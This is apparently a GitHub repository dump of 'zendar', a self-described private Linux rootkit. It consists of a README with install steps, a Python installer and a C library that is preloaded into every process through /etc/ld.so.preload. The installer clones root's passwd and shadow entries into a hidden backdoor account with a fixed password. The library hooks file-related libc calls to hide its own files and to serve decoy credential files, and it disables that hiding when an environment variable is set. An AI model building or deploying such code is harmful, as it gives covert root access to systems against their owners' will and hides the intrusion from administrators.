├── config_files ├── zendarrc └── login.c ├── README.md ├── install └── zendar.c /config_files/zendarrc: -------------------------------------------------------------------------------- 1 | alias ls='ls --color=auto' 2 | PS1='\u@zendar \W >> ' 3 | ZENDAR='1' 4 | -------------------------------------------------------------------------------- /config_files/login.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define LOGIN_MSG "And there's a NoNo for him too!" 5 | 6 | int main(void){ 7 | char *args[4]; 8 | args[0] = "/bin/bash"; 9 | args[1] = "--rcfile"; 10 | args[2] = "/etc/ld.so.conf.d/.bashrc"; 11 | args[3] = NULL; 12 | printf("%s\n", LOGIN_MSG); 13 | execve(args[0], args, NULL); 14 | } 15 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | This is a private rootkit, and thus this README will not adhere to public requirements or preferences. 3 | Scrap that. I have virtually no need for this, it's just a shittier, but smaller version of an azazel/jynx2 hybrid. Do whatever you want with this. 4 | Alright, apparently there was some kind of strange interest in this. @Reiko: I changed how the user is prevented from removing the ld.so.preload file. I still use strstr(), so I do apologize for that, I will eventually get around to using a better method. 5 | I understand that having to change configurable variables in both install and zendar.c is a tedious operation, I will centralize all variables in the install script eventually. I have a free weekend so expect that to happen this week. 6 | @Reiko: I also removed ptrace() from the kit. 7 | ``` 8 | ``` 9 | Default configuration variables: (install) 10 | username = "zendar" 11 | password = "zendar123" 12 | salt = "password_salt" 13 | home_dir = "/etc/ld.so.conf.d/" 14 | install_dir = "/lib/" 15 | lib_name = "libsslcore.so" 16 | (zendar.c) 17 | HIDDEN_STRING "_zendar" 18 | LIB_NAME "libsslcore.so" 19 | undef DEBUG 20 | ANTI_DEBUG "Secret Sex Loaf of a Single Mom" 21 | 22 | Installation & Usage: (installation) 23 | tar xvpf zendar.tar 24 | sudo ./install 25 | (usage) 26 | ssh username@host 27 | (the following will enable core utilities) 28 | alias ls='ls --color=auto' 29 | export PS1='\u@zendar \W >> ' 30 | (VITAL, YOU MUST ENABLE THE FOLLOWING!) 31 | export ZENDAR='1' 32 | ``` 33 | -------------------------------------------------------------------------------- /install: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import os 4 | import crypt 5 | import random 6 | import string 7 | 8 | #username and password, password requires a salt, see below 9 | username = "zendar" 10 | password = "zendar123" 11 | 12 | #password salt, a random string is more effective 13 | salt = "password_salt" 14 | 15 | #uncomment the following line if you would rather generate a random salt 16 | #salt = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for x in range(8)) 17 | 18 | #home dir that is used via an environment variable after logging in 19 | #to use, type cd $(ZENDAR_HOME) 20 | home_dir = "/etc/ld.so.conf.d/" 21 | 22 | #directory that zendar will be installed to, best just left as default 23 | install_dir = "/lib/" 24 | 25 | #name of fakelib, you will also need to change this in zendar.c 26 | lib_name = "libsslcore.so" 27 | 28 | def main(): 29 | print("[x] moving required zendar files") 30 | os.system("cp config_files/zendarrc /etc/ld.so.conf.d/.bashrc") 31 | passwd = open("/etc/passwd", "r").read().split("\n") 32 | shadow = open("/etc/shadow", "r").read().split("\n") 33 | passwd_root = "" 34 | shadow_root = "" 35 | for x in passwd: 36 | if "root:x:0:0:root" in x: 37 | print("[x] /etc/passwd root found") 38 | passwd_root += x 39 | break 40 | for x in shadow: 41 | if "root" in x: 42 | print("[x] /etc/shadow root found") 43 | shadow_root += x 44 | break 45 | passwd_root_split = passwd_root.split(":") 46 | shadow_root_split = shadow_root.split(":") 47 | 48 | passwd_root_split[0] = username 49 | shadow_root_split[0] = username 50 | 51 | passwd_root_split[4] = username 52 | passwd_root_split[5] = home_dir 53 | 54 | new_passwd = "" 55 | for x in passwd_root_split: 56 | new_passwd += x+":" 57 | new_passwd = new_passwd[:-1] 58 | 59 | shadow_root_split[1] = "{0}".format(crypt.crypt(password, "$6${0}$".format(salt))) 60 | 61 | new_shadow = "" 62 | for x in shadow_root_split: 63 | new_shadow += x+":" 64 | new_shadow = new_shadow[:-1] 65 | 66 | open("/etc/.passwd", "w").write(open("/etc/passwd", "r").read()) 67 | open("/etc/.shadow", "w").write(open("/etc/shadow", "r").read()) 68 | open("/etc/passwd", "a").write(new_passwd) 69 | open("/etc/shadow", "a").write(new_shadow) 70 | print("[x] box backdoored, compiling requisites") 71 | os.system("gcc config_files/login.c -o {0}login".format(home_dir)) 72 | print("[x] requisites compiled. compiling rootkit!") 73 | os.system("gcc -fPIC -c -o zendar.o zendar.c") 74 | os.system("gcc -shared -fPIC -Wl,-soname -Wl,{0} -ldl -o {0} zendar.o".format(lib_name)) 75 | print("[x] zendar compiled. installing...") 76 | os.system("test -d {0} || mkdir {0}".format(install_dir[:-1])) 77 | os.system("install -m 0755 {0} {1}".format(lib_name, install_dir)) 78 | open("/etc/ld.so.preload","w").write("{0}{1}".format(install_dir, lib_name)) 79 | print("[x] zendar compiled and installed into system") 80 | os.unlink("{0}".format(lib_name)); os.unlink("zendar.o") 81 | print("[x] installation complete") 82 | 83 | if __name__ == "__main__": 84 | main() 85 | -------------------------------------------------------------------------------- /zendar.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | //user defined variables [START] 4 | 5 | #undef DEBUG 6 | #define ANTI_DEBUG "Secret Sex Loaf of a Single Mom" 7 | #define HIDDEN_STRING "_zendar" 8 | #define LIB_NAME "libsslcore.so" 9 | 10 | //user defined variables [END] 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | 19 | #include 20 | #include 21 | 22 | int zendarU(){ 23 | const char *s = getenv("ZENDAR"); 24 | if(s != NULL){ 25 | return 1; 26 | } 27 | return 0; 28 | } 29 | 30 | int hiddenFile(const char *a){ 31 | if(strstr(a, LIB_NAME) != NULL){ 32 | return 1; 33 | } 34 | char cwd[1024]; 35 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 36 | if(strstr(cwd, "/etc") != NULL && strstr(a, "ld.so.preload") != NULL){ 37 | return 1; 38 | } 39 | } 40 | if(strstr(a, "/etc/ld.so.preload") != NULL){ 41 | return 1; 42 | } 43 | if(strstr(a, HIDDEN_STRING) != NULL){ 44 | return 1; 45 | } 46 | return 0; 47 | } 48 | 49 | int access(const char *path, int amode){ 50 | #ifdef DEBUG 51 | printf("access() hooked.\n"); 52 | #endif 53 | typeof(access) *old_access = dlsym(RTLD_NEXT, "access"); 54 | if(zendarU()){ 55 | return old_access(path, amode); 56 | } 57 | if(hiddenFile(path)){ 58 | return -1; 59 | } 60 | return old_access(path, amode); 61 | } 62 | 63 | int rmdir(const char *pathname){ 64 | #ifdef DEBUG 65 | printf("rmdir() hooked.\n"); 66 | #endif 67 | typeof(rmdir) *old_rmdir = dlsym(RTLD_NEXT, "rmdir"); 68 | if(zendarU()){ 69 | return old_rmdir(pathname); 70 | } 71 | if(hiddenFile(pathname)){ 72 | return -1; 73 | } 74 | return old_rmdir(pathname); 75 | } 76 | 77 | int stat(const char *pathname, struct stat *buf){ 78 | #ifdef DEBUG 79 | printf("stat() hooked.\n"); 80 | #endif 81 | typeof(stat) *old_stat = dlsym(RTLD_NEXT, "stat"); 82 | if(zendarU()){ 83 | return old_stat(pathname, buf); 84 | } 85 | if(hiddenFile(pathname)){ 86 | return -1; 87 | } 88 | return old_stat(pathname, buf); 89 | } 90 | 91 | int stat64(const char *pathname, struct stat64 *buf){ 92 | #ifdef DEBUG 93 | printf("stat64() hooked.\n"); 94 | #endif 95 | typeof(stat64) *old_stat64 = dlsym(RTLD_NEXT, "stat64"); 96 | if(zendarU()){ 97 | return old_stat64(pathname, buf); 98 | } 99 | if(hiddenFile(pathname)){ 100 | return -1; 101 | } 102 | return old_stat64(pathname, buf); 103 | } 104 | 105 | int __xstat(int ver, const char *path, struct stat *buf){ 106 | #ifdef DEBUG 107 | printf("__xstat() hooked.\n"); 108 | #endif 109 | typeof(__xstat) *old_xstat = dlsym(RTLD_NEXT, "__xstat"); 110 | if(zendarU()){ 111 | return old_xstat(ver, path, buf); 112 | } 113 | if(hiddenFile(path)){ 114 | return -1; 115 | } 116 | return old_xstat(ver, path, buf); 117 | } 118 | 119 | int __xstat64(int ver, const char *path, struct stat64 *buf){ 120 | #ifdef DEBUG 121 | printf("__xstat64() hooked.\n"); 122 | #endif 123 | typeof(__xstat64) *old_xstat64 = dlsym(RTLD_NEXT, "__xstat64"); 124 | if(zendarU()){ 125 | return old_xstat64(ver, path, buf); 126 | } 127 | if(hiddenFile(path)){ 128 | return -1; 129 | } 130 | return old_xstat64(ver, path, buf); 131 | } 132 | 133 | int __lxstat(int ver, const char *file, struct stat *buf){ 134 | #ifdef DEBUG 135 | printf("__lxstat() hooked.\n"); 136 | #endif 137 | typeof(__lxstat) *old_lxstat = dlsym(RTLD_NEXT, "__lxstat"); 138 | if(zendarU()){ 139 | return old_lxstat(ver, file, buf); 140 | } 141 | if(hiddenFile(file)){ 142 | return -1; 143 | } 144 | return old_lxstat(ver, file, buf); 145 | } 146 | 147 | int __lxstat64(int ver, const char *file, struct stat64 *buf){ 148 | #ifdef DEBUG 149 | printf("__lxstat64() hooked.\n"); 150 | #endif 151 | typeof(__lxstat64) *old_lxstat64 = dlsym(RTLD_NEXT, "__lxstat64"); 152 | if(zendarU()){ 153 | return old_lxstat64(ver, file, buf); 154 | } 155 | if(hiddenFile(file)){ 156 | return -1; 157 | } 158 | return old_lxstat64(ver, file, buf); 159 | } 160 | 161 | int lstat(const char *file, struct stat *buf){ 162 | #ifdef DEBUG 163 | printf("lstat() hooked.\n"); 164 | #endif 165 | typeof(lstat) *old_lstat = dlsym(RTLD_NEXT, "lstat"); 166 | if(zendarU()){ 167 | return old_lstat(file, buf); 168 | } 169 | if(hiddenFile(file)){ 170 | return -1; 171 | } 172 | return old_lstat(file, buf); 173 | } 174 | 175 | int lstat64(const char *file, struct stat64 *buf){ 176 | #ifdef DEBUG 177 | printf("lstat64() hooked.\n"); 178 | #endif 179 | typeof(lstat64) *old_lstat64 = dlsym(RTLD_NEXT, "lstat64"); 180 | if(zendarU()){ 181 | return old_lstat64(file, buf); 182 | } 183 | if(hiddenFile(file)){ 184 | return -1; 185 | } 186 | return old_lstat64(file, buf); 187 | } 188 | 189 | FILE *fopen(const char *path, const char *mode){ 190 | #ifdef DEBUG 191 | printf("fopen() hooked.\n"); 192 | #endif 193 | typeof(fopen) *old_fopen = dlsym(RTLD_NEXT, "fopen"); 194 | if(zendarU()){ 195 | return old_fopen(path, mode); 196 | } 197 | if(hiddenFile(path)){ 198 | return NULL; 199 | } 200 | return old_fopen(path, mode); 201 | } 202 | 203 | FILE *fopen64(const char *path, const char *mode){ 204 | #ifdef DEBUG 205 | printf("fopen64() hooked.\n"); 206 | #endif 207 | typeof(fopen64) *old_fopen64 = dlsym(RTLD_NEXT, "fopen64"); 208 | if(zendarU()){ 209 | return old_fopen64(path, mode); 210 | } 211 | if(hiddenFile(path)){ 212 | return NULL; 213 | } 214 | return old_fopen64(path, mode); 215 | } 216 | 217 | DIR *opendir(const char *name){ 218 | #ifdef DEBUG 219 | printf("opendir() hooked.\n"); 220 | #endif 221 | typeof(opendir) *old_opendir = dlsym(RTLD_NEXT, "opendir"); 222 | if(zendarU()){ 223 | return old_opendir(name); 224 | } 225 | if(strstr(name, ".")){ 226 | char cwd[1024]; 227 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 228 | if(hiddenFile(cwd)){ 229 | return -1; 230 | } 231 | } 232 | } 233 | if(strstr(name, HIDDEN_STRING)){ 234 | char cwd[1024]; 235 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 236 | return -1; 237 | } 238 | } 239 | return old_opendir(name); 240 | } 241 | 242 | DIR *opendir64(const char *name){ 243 | #ifdef DEBUG 244 | printf("opendir64() hooked.\n"); 245 | #endif 246 | typeof(opendir64) *old_opendir64 = dlsym(RTLD_NEXT, "opendir64"); 247 | if(zendarU()){ 248 | return old_opendir64(name); 249 | } 250 | if(strstr(name, ".")){ 251 | char cwd[1024]; 252 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 253 | if(hiddenFile(cwd)){ 254 | return -1; 255 | } 256 | } 257 | } 258 | if(strstr(name, HIDDEN_STRING)){ 259 | char cwd[1024]; 260 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 261 | return -1; 262 | } 263 | } 264 | } 265 | 266 | int mkdir(const char *pathname, mode_t mode){ 267 | #ifdef DEBUG 268 | printf("mkdir() hooked.\n"); 269 | #endif 270 | typeof(mkdir) *old_mkdir = dlsym(RTLD_NEXT, "mkdir"); 271 | if(zendarU()){ 272 | return old_mkdir(pathname, mode); 273 | } 274 | if(hiddenFile(pathname)){ 275 | return -1; 276 | } 277 | return old_mkdir(pathname, mode); 278 | } 279 | 280 | int openat(int dirfd, const char *pathname, int flags, mode_t mode){ 281 | #ifdef DEBUG 282 | printf("openat() hooked.\n"); 283 | #endif 284 | typeof(openat) *old_openat = dlsym(RTLD_NEXT, "openat"); 285 | if(zendarU()){ 286 | return old_openat(dirfd, pathname, flags, mode); 287 | } 288 | if(hiddenFile(pathname)){ 289 | return -1; 290 | } 291 | return old_openat(dirfd, pathname, flags, mode); 292 | } 293 | 294 | int creat(const char *pathname, mode_t mode){ 295 | #ifdef DEBUG 296 | printf("creat() hooked.\n"); 297 | #endif 298 | typeof(creat) *old_creat = dlsym(RTLD_NEXT, "creat"); 299 | if(zendarU()){ 300 | return old_creat(pathname, mode); 301 | } 302 | if(hiddenFile(pathname)){ 303 | return -1; 304 | } 305 | return old_creat(pathname, mode); 306 | } 307 | 308 | int open(const char *pathname, int flags, mode_t mode){ 309 | #ifdef DEBUG 310 | printf("open() hooked.\n"); 311 | #endif 312 | typeof(open) *old_open = dlsym(RTLD_NEXT, "open"); 313 | if(zendarU()){ 314 | return old_open(pathname, flags, mode); 315 | } 316 | if(strstr(pathname, "/etc/passwd")){ 317 | return old_open("/etc/.passwd", flags, mode); 318 | } 319 | if(strstr(pathname, "/etc/shadow")){ 320 | return old_open("/etc/.shadow", flags, mode); 321 | } 322 | if(hiddenFile(pathname)){ 323 | return -1; 324 | } 325 | return old_open(pathname, flags, mode); 326 | } 327 | 328 | int rename(const char *oldpath, const char *newpath){ 329 | #ifdef DEBUG 330 | printf("rename() hooked."); 331 | #endif 332 | typeof(rename) *old_rename = dlsym(RTLD_NEXT, "rename"); 333 | if(zendarU()){ 334 | return old_rename(oldpath, newpath); 335 | } 336 | if(hiddenFile(oldpath) || hiddenFile(newpath)){ 337 | return -1; 338 | } 339 | } 340 | 341 | int link(const char *oldpath, const char *newpath){ 342 | #ifdef DEBUG 343 | printf("link() hooked.\n"); 344 | #endif 345 | typeof(link) *old_link = dlsym(RTLD_NEXT, "link"); 346 | if(zendarU()){ 347 | return old_link(oldpath, newpath); 348 | } 349 | if(hiddenFile(oldpath) || hiddenFile(newpath)){ 350 | return -1; 351 | } 352 | return old_link(oldpath, newpath); 353 | } 354 | 355 | int unlink(const char *path){ 356 | #ifdef DEBUG 357 | printf("unlink() hooked.\n"); 358 | #endif 359 | typeof(unlink) *old_unlink = dlsym(RTLD_NEXT, "unlink"); 360 | if(zendarU()){ 361 | return old_unlink(path); 362 | } 363 | if(hiddenFile(path)){ 364 | return -1; 365 | } 366 | return old_unlink(path); 367 | } 368 | 369 | int unlinkat(int fd, const char *path, int flag){ 370 | #ifdef DEBUG 371 | printf("unlinkat() hooked.\n"); 372 | #endif 373 | typeof(unlinkat) *old_unlinkat = dlsym(RTLD_NEXT, "unlinkat"); 374 | if(zendarU()){ 375 | return old_unlinkat(fd, path, flag); 376 | } 377 | if(hiddenFile(path)){ 378 | return -1; 379 | } 380 | return old_unlinkat(fd, path, flag); 381 | } 382 | --------------------------------------------------------------------------------